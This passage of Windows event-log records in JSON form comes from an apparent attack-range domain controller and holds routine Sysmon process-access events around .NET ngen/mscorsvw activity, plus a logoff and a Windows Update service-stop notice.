C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:33.554","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0411-5F25-0000-0010B5680B00}","TargetProcessId":"4236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6190,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:33.554\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nTargetProcessId: 4408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:33.554","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","TargetProcessId":"4408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6191,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:33.757\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0411-5F25-0000-0010076C0B00}\r\nTargetProcessId: 3804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:33.757","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0411-5F25-0000-0010076C0B00}","TargetProcessId":"3804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6192,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:33.757\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0411-5F25-0000-0010076C0B00}\r\nTargetProcessId: 3804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:33.757","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0411-5F25-0000-0010076C0B00}","TargetProcessId":"3804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6193,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:33.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0411-5F25-0000-0010076C0B00}\r\nTargetProcessId: 3804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:33.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0411-5F25-0000-0010076C0B00}","TargetProcessId":"3804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6194,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:33.929\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0411-5F25-0000-0010346F0B00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:33.929","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0411-5F25-0000-0010346F0B00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6195,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:33.929\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0411-5F25-0000-0010346F0B00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:33.929","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0411-5F25-0000-0010346F0B00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6196,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:33.929\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0411-5F25-0000-0010346F0B00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:33.929","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0411-5F25-0000-0010346F0B00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220692,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xB2106\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xb2106","LogonType":"3","EventReceivedTime":"2020-08-01 05:56:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76862,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Windows Update service entered the stopped state.","param1":"Windows Update","param2":"stopped","EventReceivedTime":"2020-08-01 05:56:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
